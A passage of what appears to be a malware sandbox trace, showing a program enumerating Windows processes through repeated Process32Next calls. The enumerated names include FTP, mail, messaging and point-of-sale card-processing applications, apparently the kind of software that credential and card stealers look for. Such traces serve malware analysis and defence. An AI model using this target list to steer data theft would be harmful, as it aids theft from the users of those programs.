th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.836] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.839] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.843] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.846] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.848] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.850] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.852] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.854] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.948] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.953] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.955] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.958] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.960] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.962] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.964] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.967] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.969] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.971] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.974] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0184.976] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.978] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0184.981] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.983] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0185.027] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0185.029] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0185.032] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0185.035] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0185.039] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0185.041] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.043] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.045] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0185.047] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.049] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.052] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.054] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.056] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.059] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0185.061] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0185.063] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0185.070] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0185.073] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0185.075] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0185.077] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0185.079] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0185.081] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0185.084] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0185.086] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0185.088] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0185.090] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0185.092] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0185.095] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0185.097] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0185.099] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0185.101] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0185.104] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0185.112] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0185.115] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0185.119] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0185.122] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0185.124] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0185.127] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0185.130] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0185.133] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0185.136] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0185.138] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0185.141] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0185.144] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0185.184] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0185.196] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0185.199] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0185.202] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0185.205] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0185.208] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0185.210] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0185.214] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0185.218] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0185.220] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0185.223] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0185.226] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0185.228] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0185.235] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0185.238] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0185.240] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0185.243] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0185.245] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 